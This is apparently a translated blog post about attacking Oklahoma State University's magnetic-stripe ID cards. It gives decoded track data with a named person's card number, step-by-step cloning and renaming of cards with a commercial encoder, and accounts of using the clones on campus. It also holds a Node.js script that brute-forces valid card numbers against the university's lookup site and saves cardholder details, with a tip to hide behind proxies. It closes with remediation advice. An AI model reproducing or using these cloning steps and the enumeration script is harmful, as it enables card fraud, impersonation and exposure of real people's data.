Black out student cards at Oklahoma State University
0x00 basic magnetic stripe knowledge
All content in this article is for study and research purposes only. If it is used for illegal purposes, you are solely responsible for any consequences!
Note: magnetic stripe cards, rather than IC cards, are not specifically described in this document.
A magnetic card is a card-like magnetic recording medium that uses magnetic carriers to record character and digital information for identity or other purposes. Magnetic stripe is a thin layer of material (also called pigment) consisting of Oriented iron oxide particles ). Tightly bonded together with Resin Adhesive and bonded to non-magnetic substrate media such as paper or plastic.
Magnetic stripe is generally divided into two types: high coercive force (HiCo) and low coercive force (LoCo. HiCo is suitable for scenarios with high usage frequency, such as credit card. LoCo's magnetic stripe has a low magnetic volume and low production cost, but its disadvantage is that it is easier to erase and has a short life.
Magnetic Force: indicates the reverse magnetic field strength required to reduce the magnetic induction strength of a permanent magnet from magnetization to technical saturation to zero.
The reader is generally compatible with two types of magnetic stripe: HiCo and LoCo. The HiCo writer is generally compatible with two types of magnetic cards: HiCo and LoCo. The LoCo writer can only write data to the LoCo magnetic card. In real life, the LoCo magnetic stripe is generally light brown, while the HiCo magnetic stripe is dark black.
At present, it is known that there are three channels on the card, which are commonly used as the first and second channels.
There are two formats of information on the first track: format A, used by the card issuer, format B, as follows:
Start sign -- 1 character (usually "%") format code = "B" -- 1 character (only letters can be used) primary Account -- a maximum of 19 character field delimiters -- 1 character country/region code -- three character cardholder name -- 2 ~ 26-character expiration date or field separator-4 or 1-character Service Code-3-character free data-variable, up to the maximum record length (79 characters ), usually contains PIN verification data (PVKI, 1 character), PIN verification value (PVV, 4 characters), card verification value or verification code (CVV or CVC, 3 characters) end sign-1 character (usually "?" ") Vertical redundancy check character (LRC)-1 Character
Second Track:
Start flag-1 character (usually ";") primary account-a maximum of 19 character field delimiters-1 character (usually "= ") expiration date or field separator-4 or 1 character Service Code-3 characters free data-variable, not exceeding the maximum record length (79 characters ), usually contains PIN verification data (PVKI, 1 character), PIN verification value (PVV, 4 characters), card verification value or verification code (CVV or CVC, 3 characters) end sign-1 character (usually "?" ") Vertical redundancy check character (LRC)-1 character, no return value when reading, for internal verification only
Significance of service code value in financial magnetic cards:
First Digit:
1: International Business
2: Use IC (CHIP) for international business
5: International Business under domestic and bilateral agreements
6: use IC (CHIP) for international business under domestic and bilateral protocols
7: No business (Closed Loop) except bilateral agreements)
9: Test Mode
Second digit:
0: normal
2. open an account online
4: Online activation of bilateral protocols
Third digit:
0: No restrictions. PIN verification is required.
1: No restrictions
2: Goods loan service (non-cash business)
3: only ATM, PIN required
4: Only cash business
5: Goods loan service requiring PIN code verification (non-cash business)
6: No restrictions. You can use the PIN code for verification.
7: Goods loan service (non-cash business), which can be verified using a PIN code
0x01 Oklahoma State University idca
The idcard of Oklahoma State University is an identity authentication card officially released by the University for the following purposes:
Cardholder Identity Authentication
Access cards for specific campus areas
Card recharge
Certification for various functions of Campus Network (http://it.okstate.edu/services/id)
The card is long. Pay attention to the card number in the lower right corner. Each card has a unique 16-digit card number)
0x02 do what you say
First, we found that the ID of each card starts with the number "60383800". After the analysis, there are only three situations: "05", "06", and "11.
In the last six digits, we turn him into the ending number, which is 0 ~ A Random Number of 9. That is to say, there are a total of 1 million possible card numbers, plus the first three prefixes, a total of 3 million possibilities.
And this address can be used for us to check whether the ID is valid: https://app.it.okstate.edu/idcard/
This webpage allows anyone to enter a 16-digit ID number to check whether the card number is valid.
After a valid ID is queried, the following results are displayed:
If the card number is invalid, the result is as follows:
The content returned by the card number query is:
Card No.: ID entered idcard status: valid or invalid employment status: current employment status of the holder student status: current registration status of the holder other: remarks and bank card information
This query page has a disclaimer: "IP addresses using this query function will be recorded", designed to prevent unauthorized access by users in other regions, however, IP addresses can be disguised by proxy, which is common knowledge of even primary school students.
From here the http://www.rakuten.com/prod/usb-3-track-magnetic-credit-card-reader/240738725.html costs $25 to buy a USB magnetic stripe reader for decoding the idcard.
After decoding our student card, we get the following information:
%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Based on the track structure we mentioned earlier, we can conclude that:
First track:
% BID card number ^ cardholder name ^ expiration time: 49/12 Service Code: 120 free data: 000000000 000?
Second Track:
; ID card number = expiration time: 49/12 Service Code: 120 free data: 0000000000000?
The two most interesting items are that all people have an expiration date of 49/12, and all free data (verify PIN code) is empty (0 fill ).
0x03
So far, we have the following clues:
All the teachers and students in the school have this idcard. The first eight digits of all cards are 60383800. The ninth digit of all cards is only three: 05, 06, 11 there are about 3 million possible card numbers there is a ready-made website that can query the validity of the ID card number, this station may record all our IP card expiration time consistent, all are 49/12. The free data department of all cards is empty (0 fill)
0x04
We use the MSRC206 magnetic reader produced by unitech ). This commercial-grade magnetic stripe reader supports HiCo and LoCo magnetic cards and has a powerful encoder that can cover the existing HiCo card.
The next step is exciting magnetic card replication. The steps are as follows:
Plug in the MSRC206 power supply, connect to the computer-Allow installation of the driver MSRC206 software with the wait for MSRC206 to connect to MSRC206 software click the "read" button on the right of the software to swipe the source card, to obtain the encoded data, click the "write" button on the right of the software to swipe the card and write the data.
Source card data:
%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Data copied to the blank card:
%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Data copied to the blank card after the cardholder name is modified:
%B6038380006514029^PETE/PISTOL ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Comparison:
%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?;6038380006514029=49121200000000000000?%B6038380006514029^PETE/PISTOL ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Note: we have modified the cardholder's name, but the card number has not been changed.
In the upper-left corner, click the data copy card after the name is changed. in the upper-right corner, click the data copy card that is directly copied from the source card. In the lower-left corner, click the source card and click the upper-right corner.
Back photo:
0x05
Our wretched team began to use these replicated blank cards on various occasions.
First, we asked the Team's Senior Three to apply for a new card (officially issued by the school) for use in the library. As a result, the Administrator said that this ID is not in the system. If the card is newly assigned, it usually takes several days to wait for the server to be synchronized. In this operation, we learned that the school library does not perform real-time verification with the server every time it uses an idcard. Instead, it synchronizes new content from the server several days and stores it locally.
Next, we also sent the team's old skin with copies of the card spread around the campus waste, we can look at the wall of our recording Demo Video: http://youtu.be/Bw2Ugezb7Fs
We have gained some experience in the above tests:
Although the copy card looks strange, the staff still accept the white card with our handsome teammates. After the name of the cardholder who copies the card is changed, the name of the source card holder is still displayed on the purchase documents. This indicates that in the campus sales system, data is verified in real time with the server during the consumption, ensure the validity of the idcard. However, the cardholder's name is not detected.
0x06 ready for release
With the above experiment and experience, we will summarize the information we have learned:
All the teachers and students in the school have this idcard. The first eight digits of all cards are 60383800. The ninth digit of all cards is only three: 05, 06, 11 there are about 3 million possible card numbers there is a ready-made website that can query the validity of the ID card number, this station may record all our IP card expiration time consistent, all are 49/12 free data units of all cards are empty (0-filled) Unitec's MSRC206 can read, edit, and re-code the magnetic stripe library to verify that the idcard is not a white card (copy card) that connects the server in real time) the sales system that will be accepted by the staff is a sales system that communicates with the server in real time for verification. The cardholder's identity is not verified.
0x07 expanded results
Now we have enough information for large-scale operations.
First, we wrote a small network script based on node. js. Needless to say, you have guessed that we will crack the effective card number on campus!
Code:
var cheerio = require('cheerio'), request = require('request'), fs = require('fs'), headnumber = '06'; for (var i=1; i <= 100; i += 1){ var tailnumber = ''; while (tailnumber.length < 6) tailnumber = tailnumber + '' + [0,1,2,3,4,5,6,7,8,9][Math.floor(Math.random()*9)]; request.post('https://app.it.okstate.edu/idcard/index.php/module/Default/action/IDCardEntry', {form:{card_id:'60383800'+headnumber+tailnumber}}, function (error, response, html) { if (!error && response.statusCode == 200) { var $ = ch3eerio.load(html); $('td.formText').each(function() { var text = $(this).next().text(); fs.appendFile('osu_ids.txt', text+';', function(err){}); }); fs.appendFile('osu_ids.txt', '\r\n', function(err){}); } }); }
Because the free data (Verification PIN code) of all idcard is empty (0 fill), and the server does not verify the identity of the cardholder, we can use the cracked valid card number to create a large-scale copy card, then we use it to do all sorts of trivial things.
The harm caused by this is far beyond the imagination of many people. Just imagine that only a fraction of the first card that has just been recharged with 5 million is suddenly left. The school has been inexplicably warned that 1000 books in the library have not been retained; when I walked leisurely on campus, I suddenly came to two security guards to hold you and say that you were molting a girl last night ......
0x08 regression to harmony
The next step will take us away from the terrible scenes above and return to a peaceful and harmonious campus life, but it will be a bit painful to implement it.
Go offline ID card No. query website https://app.it.okstate.edu/idcard/ redesign idcard everybody resends a new idcard review, test all systems involved with idcard all systems perform strict check on verification transactions add dual Verification
Reference: http://en.wikipedia.org/wiki/Magnetic_stripe_card address: http://snelling.io/hacking-oklahoma-state-university-student-id